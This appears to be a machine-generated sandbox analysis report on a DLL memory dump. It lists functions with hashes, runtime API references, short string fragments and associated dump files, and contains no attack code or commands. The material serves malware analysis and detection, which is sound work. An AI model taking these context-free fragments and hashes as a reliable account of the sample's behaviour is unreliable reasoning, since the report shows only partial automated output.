Opcode ID: 4f16257390f5151eb90638af5b2864736796135233236c0ef1156d0f2ba98c04
Instruction ID: ddd3a354dbda9d5acd840038cd448aea3d1637a931d96cd5816d24d6bd7ddb40
Opcode Fuzzy Hash: 4f16257390f5151eb90638af5b2864736796135233236c0ef1156d0f2ba98c04
Instruction Fuzzy Hash: 56C16C75A0121A9FDB24DFA8C894B9DB7B5FF18304F2045AAD809A7350E731AEC8DF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E17E0C5, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 274COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6E17E0CC

Strings

(Get M, xrefs: 6E17E145
office b, xrefs: 6E17E17F
Run phra, xrefs: 6E17E24B
Protec, xrefs: 6E17E376
(Hundre)(.*), xrefs: 6E17E2D3

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_
String ID: (Get M$(Hundre)(.*)$Protec$Run phra$office b
API String ID: 2427045233-1334055873
Opcode ID: 96d6ad8f516ee8aa8afbdc21e2adf6b18350c392d254c20a53da2aaba7a308d6
Instruction ID: bc14c9865b1bb1fcb6a0bb4ecca8d286d859934369be3183ea575652c97b5e2f
Opcode Fuzzy Hash: 96d6ad8f516ee8aa8afbdc21e2adf6b18350c392d254c20a53da2aaba7a308d6
Instruction Fuzzy Hash: 80B1B3B2E015158FCF18CFACC9995EDBBF6BB4A300B18422AE551E7780DB309A41DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B0FD1, Relevance: 10.7, APIs: 7, Instructions: 151COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6E1B105F
DName::operator+.LIBCMT ref: 6E1B10B2

Part of subcall function 6E1AFC2F: shared_ptr.LIBCMT ref: 6E1AFC4B

Part of subcall function 6E1AFB1E: DName::operator+.LIBCMT ref: 6E1AFB3F

DName::operator+.LIBCMT ref: 6E1B10A3
DName::operator+.LIBCMT ref: 6E1B1103
DName::operator+.LIBCMT ref: 6E1B1110
DName::operator+.LIBCMT ref: 6E1B1157
DName::operator+.LIBCMT ref: 6E1B1164

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: 77d6ad3d94415078b93f615d011700fbcb1fbe5ce352c1b52d478b731ef9b764
Instruction ID: 112ed507432481d9ca23d8d96351868a2c5101466f09683308e7ed06b094b78e
Opcode Fuzzy Hash: 77d6ad3d94415078b93f615d011700fbcb1fbe5ce352c1b52d478b731ef9b764
Instruction Fuzzy Hash: 175162B5E00209AFDF05DBD8D855EEEBBBCBF1C700F11445AE515A7180EB709A88DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1ADEA0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6E1ADED7
___except_validate_context_record.LIBVCRUNTIME ref: 6E1ADEDF
_ValidateLocalCookies.LIBCMT ref: 6E1ADF68
__IsNonwritableInCurrentImage.LIBCMT ref: 6E1ADF93
_ValidateLocalCookies.LIBCMT ref: 6E1ADFE8

Strings

csm, xrefs: 6E1ADF7D

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b9cbfebb7630fb71d21fe2eb575e2488e652b5e755d9b4fc1462434a2ad97108
Instruction ID: aa48628896dd242782f329c73316c6e3243c23cd2615213c97d940545d00e8fd
Opcode Fuzzy Hash: b9cbfebb7630fb71d21fe2eb575e2488e652b5e755d9b4fc1462434a2ad97108
Instruction Fuzzy Hash: 1F419638A046099BCF00DFACC884AEEBBB5AF5532CF108155EE259B351D731DA82DF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B22EF, Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 6E1B2317
DName::DName.LIBVCRUNTIME ref: 6E1B2344

Part of subcall function 6E1AF8D0: __aulldvrm.LIBCMT ref: 6E1AF901

DName::operator+.LIBCMT ref: 6E1B235F
DName::DName.LIBVCRUNTIME ref: 6E1B237C
DName::DName.LIBVCRUNTIME ref: 6E1B23AC
DName::DName.LIBVCRUNTIME ref: 6E1B23B6
DName::DName.LIBVCRUNTIME ref: 6E1B23DD

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: NameName::$Name::operator+__aulldvrm
String ID:
API String ID: 4069495278-0
Opcode ID: 092dd1dcd2f05588bcb3cb176f7b61f72f1f56d14de5701de59470f4815568ba
Instruction ID: 8abee388382ea1317516e42fc794f6e3ccfa4fa6e2af448737a23f657b75a393
Opcode Fuzzy Hash: 092dd1dcd2f05588bcb3cb176f7b61f72f1f56d14de5701de59470f4815568ba
Instruction Fuzzy Hash: 9C31D4758442489EDF08CFE8C8A0AED7BB9BF1E314F20445DE5526B1A0E77599CDEB20

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B2947, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 6E1B296B
DName::DName.LIBVCRUNTIME ref: 6E1B298F

Strings

A, xrefs: 6E1B29EA
%lf, xrefs: 6E1B29C3

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: NameName::
String ID: %lf$A
API String ID: 1333004437-43661536
Opcode ID: af5549f8ebd053825763393725a35575325c911f8e7da5a7d54b3d31205b440f
Instruction ID: 6fc55e13b0884f1e0efaaaec686fc136927b07531d83ba5465a15f4193fa9005
Opcode Fuzzy Hash: af5549f8ebd053825763393725a35575325c911f8e7da5a7d54b3d31205b440f
Instruction Fuzzy Hash: 30318EB0E042589EDF24DFE8C844ADDBBB9BB0A304F10445EE4569B240D77498CAEB55

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F56E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6E19F575
_Maklocstr.LIBCPMT ref: 6E19F5DE
_Maklocstr.LIBCPMT ref: 6E19F5F0
_Getvals.LIBCPMT ref: 6E19F63A

Strings

true, xrefs: 6E19F5EB
false, xrefs: 6E19F5D9

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Maklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 1611767717-2658103896
Opcode ID: a87b0c469579fb5f4a31feddabedd251d438a1378be83abc892ee12255015b5a
Instruction ID: 47f7dcdf1c6d2c9f557ca67a5ae65031e22c6c65bbda4d0e5ee8ecdab874262a
Opcode Fuzzy Hash: a87b0c469579fb5f4a31feddabedd251d438a1378be83abc892ee12255015b5a
Instruction Fuzzy Hash: DC2191B2D00214ABDF04DFE5D884ADF7BACAF05714F008816B9199F141DB7095C4EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D4166, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 6E1D41BD
ext-ms-, xrefs: 6E1D41D1

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 4fb97407b0a3c34f8414789003f61b9c491fa70fb217c4229f8d5b9c1350e6c3
Instruction ID: 34f62d6f2db5b71fbb03b47f6797b5c380bd8d9d2bb90131f4fbf084fc5808dd
Opcode Fuzzy Hash: 4fb97407b0a3c34f8414789003f61b9c491fa70fb217c4229f8d5b9c1350e6c3
Instruction Fuzzy Hash: 4921EB36A45622EBDB1187E5AC44B0E3BA89F26760F214610FD21F7280D730FD86A5E1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DE2D8, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6E1DDFC3: _free.LIBCMT ref: 6E1DDFE8

_free.LIBCMT ref: 6E1DE326

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?,?), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1DE331
_free.LIBCMT ref: 6E1DE33C
_free.LIBCMT ref: 6E1DE390
_free.LIBCMT ref: 6E1DE39B
_free.LIBCMT ref: 6E1DE3A6
_free.LIBCMT ref: 6E1DE3B1

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ae654fae5267e194d9c327c9aa7d6a00b638f2bb0d6670459258e460656f4524
Instruction ID: 8d985f29430bbb847fd5d4d980815587a6152d15b3079a6d425be003bdb9ba02
Opcode Fuzzy Hash: ae654fae5267e194d9c327c9aa7d6a00b638f2bb0d6670459258e460656f4524
Instruction Fuzzy Hash: ED115E71A44B04BAD620EBF4CC85FCBB7ECAF0074CF400D16A299A6091EB75B59DAE50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D53C9, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6E1D5411
__fassign.LIBCMT ref: 6E1D55F0
__fassign.LIBCMT ref: 6E1D560D
WriteFile.KERNEL32(?,6E1C2E1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E1D5655
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E1D5695
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E1D5741

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: b7e779b970067d5abfd267b51e3719aeb146b7202222dc2dd6241404932d1da8
Instruction ID: 5e5911a02bd67ebea16ac4180e6ddf3bb91ad46e4180775bd0cf9632d6113777
Opcode Fuzzy Hash: b7e779b970067d5abfd267b51e3719aeb146b7202222dc2dd6241404932d1da8
Instruction Fuzzy Hash: 5BD1A971D00259DFDB11CFE8C8909EDBBB6FF49314F24415AE855BB241E730AA8ADB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CE325, Relevance: 9.2, APIs: 6, Instructions: 221COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1CE3B5
_free.LIBCMT ref: 6E1CE3D0
_free.LIBCMT ref: 6E1CE3DB
_free.LIBCMT ref: 6E1CE4E8

Part of subcall function 6E1D16BE: RtlAllocateHeap.NTDLL(00000008,00000010,00000000,?,6E1CF8EB,00000001,00000364,00000007,000000FF,?,6E1C23F9,6E1D1C61,00000001,?,6E1A963B,6E17DCEA), ref: 6E1D16FF

_free.LIBCMT ref: 6E1CE4BD

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?,?), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1CE4DE

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Heap$AllocateErrorFreeLast
String ID:
API String ID: 4150789928-0
Opcode ID: 284b3abe0848871cdb1d29267dac8888c57933b5bcec897f77173d3c1b3de9f9
Instruction ID: d59ae79d1577ac2ee908c9c14d66d5d8120fe8b6be2d75c6ac887c0b014aa31e
Opcode Fuzzy Hash: 284b3abe0848871cdb1d29267dac8888c57933b5bcec897f77173d3c1b3de9f9
Instruction Fuzzy Hash: A2519E366042015BDB04DFF89852AFE77B8EF50B14F240459E941DB244EA39EF87E252

Uniqueness

Uniqueness Score: -1.00%

Function 6E18CD5C, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 432COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E18CD63

Strings

:, xrefs: 6E18CF7F
-, xrefs: 6E18CFBA
^, xrefs: 6E18CEB4
], xrefs: 6E18CF21

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: -$:$]$^
API String ID: 431132790-1923447034
Opcode ID: c98ebfe99f0aca0f54b6258cb6b104cc0eb6716fa2ee0ffcd1aa9c1a7827e748
Instruction ID: 103cbc4d797479570d42f5b3b3403c3d9d604c5a71f0c795e7445abcd146c454
Opcode Fuzzy Hash: c98ebfe99f0aca0f54b6258cb6b104cc0eb6716fa2ee0ffcd1aa9c1a7827e748
Instruction Fuzzy Hash: C7F1D370A042499EEB04CBE8C490BEEBBFEAF55304F14495AD8559B281CB34E9C5EF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E17D580, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 380COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6E17D587
GetWindowsDirectoryA.KERNEL32(00000000,0000053A,00000040,6E1A9C96,?,00000001,00000000,?,00000001,00000000,?,00000001,00000000,6E216860,0000000C,00000007), ref: 6E17D621
CreateSemaphoreA.KERNEL32 ref: 6E17D6E8

Strings

direct, xrefs: 6E17D66C
Eig, xrefs: 6E17D965

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryH_prolog3_SemaphoreWindows
String ID: Eig$direct
API String ID: 262936310-466654125
Opcode ID: de263fc08db5e3b47972fc61d163f80b6a4580e314360bf635f031b68d8648ff
Instruction ID: e65e38b71b0c4dbb6d4bec81e28631afea5dba1daf5e541757930804a3a4fd48
Opcode Fuzzy Hash: de263fc08db5e3b47972fc61d163f80b6a4580e314360bf635f031b68d8648ff
Instruction Fuzzy Hash: 48F1A1B1E069598FCF4CCFA8D4DA6E8BBB3BB97304B18412AD64197740DB305681DF62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B52EE, Relevance: 9.1, APIs: 6, Instructions: 120COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6E1B5332
DName::operator+.LIBCMT ref: 6E1B533E

Part of subcall function 6E1AFC2F: shared_ptr.LIBCMT ref: 6E1AFC4B

DName::operator+=.LIBCMT ref: 6E1B53FE

Part of subcall function 6E1B3CFA: DName::operator+.LIBCMT ref: 6E1B3D65
Part of subcall function 6E1B3CFA: DName::operator+.LIBCMT ref: 6E1B4023

Part of subcall function 6E1AFB1E: DName::operator+.LIBCMT ref: 6E1AFB3F

DName::operator+.LIBCMT ref: 6E1B53B9

Part of subcall function 6E1AFC87: DName::operator=.LIBVCRUNTIME ref: 6E1AFCA8

DName::DName.LIBVCRUNTIME ref: 6E1B5422
DName::operator+.LIBCMT ref: 6E1B542E

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID:
API String ID: 2795783184-0
Opcode ID: e12bf20191afadd580aeb165d8b8b32b22eabf97976e754b8b04779ace657cb5
Instruction ID: 262f1a1948488c31e2853d1cb5bbbda57d34ed83b84b3a8700f16b1dcfc75415
Opcode Fuzzy Hash: e12bf20191afadd580aeb165d8b8b32b22eabf97976e754b8b04779ace657cb5
Instruction Fuzzy Hash: 4D41E6B0A00248AFDF00DFE8C8A0BED7BFAAB1E304F600468D1969B290E73559C5DB54

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B40AC, Relevance: 9.1, APIs: 6, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6E1B5444: Replicator::operator[].LIBVCRUNTIME ref: 6E1B5481

DName::operator=.LIBVCRUNTIME ref: 6E1B4152

Part of subcall function 6E1B3CFA: DName::operator+.LIBCMT ref: 6E1B3D65
Part of subcall function 6E1B3CFA: DName::operator+.LIBCMT ref: 6E1B4023

DName::operator+.LIBCMT ref: 6E1B410D
DName::operator+.LIBCMT ref: 6E1B4119
DName::DName.LIBVCRUNTIME ref: 6E1B4166
DName::operator+.LIBCMT ref: 6E1B4175
DName::operator+.LIBCMT ref: 6E1B4181

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID:
API String ID: 955152517-0
Opcode ID: 789d985ffef7157be970ff3d41e8f7e6e373788bf99c22f960e05e2fb955c835
Instruction ID: cf55af07f237bd52a47ddabeb1c512094db4b7f66337860ab9910f9acd1f58dd
Opcode Fuzzy Hash: 789d985ffef7157be970ff3d41e8f7e6e373788bf99c22f960e05e2fb955c835
Instruction Fuzzy Hash: 8E3161B5A04304EFCB44CFD8D8A0AE9BBF9AF6D304F10885DE69A97340E7316589DB54

Uniqueness

Uniqueness Score: -1.00%

Function 6E18FA20, Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E18FA27
std::_Lockit::_Lockit.LIBCPMT ref: 6E18FA31

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

codecvt.LIBCPMT ref: 6E18FA6B
std::_Facet_Register.LIBCPMT ref: 6E18FA82
std::_Lockit::~_Lockit.LIBCPMT ref: 6E18FAA2
Concurrency::cancel_current_task.LIBCPMT ref: 6E18FAAF

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercodecvt
String ID:
API String ID: 614290800-0
Opcode ID: ef0ce032fd3b4ebade181b484ed260145cea8a2103d5f5434433d11adfc6f174
Instruction ID: 1a7c17a4ff95586dd976a022b2b0ec220a555b2cdd9b1fd7ed3e39384983d8bd
Opcode Fuzzy Hash: ef0ce032fd3b4ebade181b484ed260145cea8a2103d5f5434433d11adfc6f174
Instruction Fuzzy Hash: E7110B35A002299BCF05DBD4CC14AEE77BDAF88724F244419F825AB280DF749EC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1914CD, Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1914D4
std::_Lockit::_Lockit.LIBCPMT ref: 6E1914DE

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

codecvt.LIBCPMT ref: 6E191518
std::_Facet_Register.LIBCPMT ref: 6E19152F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19154F
Concurrency::cancel_current_task.LIBCPMT ref: 6E19155C

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercodecvt
String ID:
API String ID: 614290800-0
Opcode ID: dd8e8d59f13f7015686ab87ad091b4ddf5f7d2e59446eb85cf6cf350f2f71d54
Instruction ID: b56ac000eec935405a4d9785693c7d1441b70ddc16c33e0f4b1c40f14b60fd13
Opcode Fuzzy Hash: dd8e8d59f13f7015686ab87ad091b4ddf5f7d2e59446eb85cf6cf350f2f71d54
Instruction Fuzzy Hash: D811E975B001159BCB05DBE8D810AFD777DAF85714F264819E816AB280CF709EC8FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE211, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6E1ADE27,6E1A9752,6E1A9A47,?,6E1A9C7F,?,00000001,?,?,00000001,?,6E216860,0000000C,6E1A9D81), ref: 6E1AE21F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E1AE22D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E1AE246
SetLastError.KERNEL32(00000000,6E1A9C7F,?,00000001,?,?,00000001,?,6E216860,0000000C,6E1A9D81,?,00000001,?), ref: 6E1AE298

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
